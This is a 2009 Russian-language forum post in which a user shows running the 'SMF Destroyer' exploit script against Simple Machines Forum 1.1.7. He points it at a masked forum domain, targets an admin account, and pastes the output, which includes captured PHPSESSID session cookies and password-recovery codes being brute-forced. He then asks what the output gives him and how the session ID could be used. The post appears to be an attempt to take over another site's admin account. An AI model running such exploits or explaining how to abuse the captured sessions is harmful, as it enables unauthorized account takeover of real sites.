
05.03.2009, 17:10
|
|
Познающий
Регистрация: 15.07.2008
Сообщений: 33
С нами:
9380482
Репутация:
8
|
|
Вопрос по exploit для SMF 1.1.7 (http://www.securitylab.ru/poc/extra/366302.php)
Вот что ролучается
Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]
Example: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128
C:\Err0r\exploits>perl smf.pl -c http://forum.хххх.ру/ lo6ara 322
SMF Destroyer 0.1 By Xianur0 [Priv8]
[-] Sending Mail...
[+] SESSION Detected: PHPSESSID=p9r60qks24t47n776a5klsotg4; path=/
[+] sc Detected: 6b7693f9d664395f8c1d7bad6ec323ca
[x]Sent!
[-] Attacking code link recovery...
[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd
И дальши вниз долго идут разные строки вида
[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd
Че это мне все дает ? и в чем может пригодится PHPSESSID ?
|
|
|